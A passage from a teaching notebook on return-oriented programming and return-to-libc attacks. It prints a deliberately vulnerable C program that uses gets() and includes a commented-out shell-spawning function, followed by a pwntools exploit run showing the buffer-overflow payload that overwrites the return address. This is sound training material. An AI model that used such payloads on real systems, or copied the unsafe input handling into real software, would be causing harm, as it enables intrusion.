# Return Orientied Programming
- [https://en.wikipedia.org/wiki/Return-oriented_programming](https://en.wikipedia.org/wiki/Return-oriented_programming)
- [Return-Oriented Programming: Systems, Languages, and Applications](https://hovav.net/ucsd/dist/rop.pdf)
- advanced version of stack overflow or stack smashing attack
- a security exploit technqiue that allows an attacker to execute code in the presence of security defenses such as executable protection and code signing
- attackers hijack's the program return control flow and the executes carefully chosen machine instruction sequences that are already present in the machine's memory, called `gadgets`

## Return to libc attack
- if stack propery is set as RW (Read and Write, by default), it is impossible to smuggle the shellcode into buffer and use it to exploit the vulnerable program
- shared libraries such as libc, often contain subroutines for performing system system calls and other functionality potentially useful to an attacker - such as give_shell() function is `ctf-demos/rop_basic/vuln.c` program
- we'll use c-program for this demonstration because most CTF platforms use C programs
- in `return to libc` attack, attacker chooses available library function and overwrities the return address with its entry location
- function calls can be carefully combined and chained using the `rop gadgets`
- use the provided Makefile to compile the vuln.c program
- note that the gcc compiler switch `-z execstack` is removed from the Makefile
    - this make the stack RW only thus protecting from smuggling attacker's arbitrary code
- YouTube video - [https://www.youtube.com/watch?v=gWU2yOu0COk&ab_channel=ChristopherSchafer](https://www.youtube.com/watch?v=gWU2yOu0COk&ab_channel=ChristopherSchafer)

In [3]:
! cat ctf-demos/rop_basic/vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 128

/*
void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}
*/

void vuln(){
  char buf[BUFSIZE];
  puts("Give me some text:");
  fflush(stdout);
  gets(buf);
  puts(buf);
  fflush(stdout);
}

int main(int argc, char **argv){
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  vuln();
  return 0;
}

- create offset using `pwn template`

```bash
┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop_basic]
└─$ pwn template ./vuln.exe --host localhost --port 1234 > exploit.py
```

- update and run exploit.py locally in DEBUG mode

```bash
┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop_basic]
└─$ python exploit.py LOCAL DEBUG
[DEBUG] PLT 0x8049030 fflush
[DEBUG] PLT 0x8049040 gets
[DEBUG] PLT 0x8049050 getegid
[DEBUG] PLT 0x8049060 puts
[DEBUG] PLT 0x8049070 __libc_start_main
[DEBUG] PLT 0x8049080 setresgid
[*] '/home/kali/EthicalHacking/ctf-demos/rop_basic/vuln.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process '/home/kali/EthicalHacking/ctf-demos/rop_basic/vuln.exe': pid 12899
[*] Loaded 10 cached gadgets for './vuln.exe'
[DEBUG] PLT 0x25040 realloc
[DEBUG] PLT 0x25090 __tls_get_addr
[DEBUG] PLT 0x250d0 memalign
[DEBUG] PLT 0x250e0 _dl_exception_create
[DEBUG] PLT 0x25120 __tunable_get_val
[DEBUG] PLT 0x251e0 _dl_find_dso_for_object
[DEBUG] PLT 0x25220 calloc
[DEBUG] PLT 0x25300 __libpthread_freeres
[DEBUG] PLT 0x25308 malloc
[DEBUG] PLT 0x25310 __libdl_freeres
[DEBUG] PLT 0x25318 free
[*] '/home/kali/EthicalHacking/ctf-demos/rop_basic/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] Received 0x13 bytes:
    b'Give me some text:\n'
[DEBUG] Sent 0x91 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61  6a 61 61 61  6b 61 61 61  6c 61 61 61  │iaaa│jaaa│kaaa│laaa│
    00000030  6d 61 61 61  6e 61 61 61  6f 61 61 61  70 61 61 61  │maaa│naaa│oaaa│paaa│
    00000040  71 61 61 61  72 61 61 61  73 61 61 61  74 61 61 61  │qaaa│raaa│saaa│taaa│
    00000050  75 61 61 61  76 61 61 61  77 61 61 61  78 61 61 61  │uaaa│vaaa│waaa│xaaa│
    00000060  79 61 61 61  7a 61 61 62  62 61 61 62  63 61 61 62  │yaaa│zaab│baab│caab│
    00000070  64 61 61 62  65 61 61 62  66 61 61 62  67 61 61 62  │daab│eaab│faab│gaab│
    00000080  68 61 61 62  69 61 61 62  6a 61 61 62  1b 92 04 08  │haab│iaab│jaab│····│
    00000090  0a                                                  │·│
    00000091
[DEBUG] Received 0xa4 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61  6a 61 61 61  6b 61 61 61  6c 61 61 61  │iaaa│jaaa│kaaa│laaa│
    00000030  6d 61 61 61  6e 61 61 61  6f 61 61 61  70 61 61 61  │maaa│naaa│oaaa│paaa│
    00000040  71 61 61 61  72 61 61 61  73 61 61 61  74 61 61 61  │qaaa│raaa│saaa│taaa│
    00000050  75 61 61 61  76 61 61 61  77 61 61 61  78 61 61 61  │uaaa│vaaa│waaa│xaaa│
    00000060  79 61 61 61  7a 61 61 62  62 61 61 62  63 61 61 62  │yaaa│zaab│baab│caab│
    00000070  64 61 61 62  65 61 61 62  66 61 61 62  67 61 61 62  │daab│eaab│faab│gaab│
    00000080  68 61 61 62  69 61 61 62  6a 61 61 62  1b 92 04 08  │haab│iaab│jaab│····│
    00000090  0a 47 69 76  65 20 6d 65  20 73 6f 6d  65 20 74 65  │·Giv│e me│ som│e te│
    000000a0  78 74 3a 0a                                         │xt:·│
    000000a4
[DEBUG] Sent 0x12 bytes:
    b'Do you read this?\n'
[*] Switching to interactive mode
Give me some text:
[DEBUG] Received 0x12 bytes:
    b'Do you read this?\n'
Do you read this?
[*] Got EOF while reading in interactive
```